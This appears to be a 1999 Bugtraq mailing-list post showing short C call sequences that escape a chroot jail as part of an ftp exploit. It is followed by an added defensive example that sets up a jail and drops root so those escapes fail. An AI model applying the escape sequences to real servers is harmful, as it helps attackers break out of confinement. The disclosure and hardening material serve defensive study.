Bugtraq mailing list archives
Re: another ftp exploit (fwd)
From: artem () AM ALEXRADIO COM (Artem Malyshev)
Date: Fri, 26 Mar 1999 14:08:25 +0200
/*
  To break chroot we have to...

  fd = open ( ".", O_RDONLY );
  mkdir ( "hax0r", 0666 );
  chroot ( "hax0r" );
  fchdir ( fd );
  for ( i = 0; i < 254; i++ )
    chdir ( ".." );
  chroot ( "." );
*/

Too complex for standard linux

All we have to do to break chroot is:

mkdir("/sh");     // we already have string "/sh" in memory as a part of
                  // "/bin/sh"
chroot("/sh");
chroot("../../../../../../../../../");  // a number of "../" here,
                                        // I used 0x10

Last string can be built on the stack with a simple loop

Tested on linux 2.2.1

-am
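Added example (not part of the original post): both sequences above depend on the jailed process still being able to call chroot(), which requires root, and on chroot() leaving the working directory untouched. The sketch below shows a jail setup that removes both conditions. enter_jail(), the JAIL_* codes and uid/gid 65534 are hypothetical names and values chosen for illustration.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE           /* for chroot() and setgroups() on glibc */
#endif
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

enum { JAIL_OK = 0, JAIL_EBADID = -1, JAIL_ECHDIR = -2, JAIL_ECHROOT = -3,
       JAIL_EDROP = -4, JAIL_ESTILLROOT = -5 };

int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    /* A second chroot() needs root, so a jail that keeps id 0 is refused. */
    if (uid == 0 || gid == 0)
        return JAIL_EBADID;

    /* chroot() does not move the working directory: enter the jail first
       so that no cwd outside the new root is left behind. */
    if (chdir(dir) != 0)
        return JAIL_ECHDIR;
    if (chroot(".") != 0)
        return JAIL_ECHROOT;
    if (chdir("/") != 0)
        return JAIL_ECHDIR;

    /* Drop supplementary groups, then gid, then uid. The order matters:
       after setuid() the process can no longer change its groups. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return JAIL_EDROP;

    /* Verify the drop is permanent: regaining root must fail. */
    if (setuid(0) == 0 || seteuid(0) == 0 ||
        getuid() != uid || geteuid() != uid)
        return JAIL_ESTILLROOT;
    /* The call both escapes rely on must now be denied. */
    if (chroot("/") == 0)
        return JAIL_ESTILLROOT;
    return JAIL_OK;
}

int main(int argc, char **argv)
{
    if (argc != 2)
        return 2;
    /* 65534 is assumed to be an unprivileged "nobody" account. */
    return enter_jail(argv[1], 65534, 65534) == JAIL_OK ? 0 : 1;
}
```

Directory descriptors opened before the call still refer to locations outside the jail, so close them before entering it.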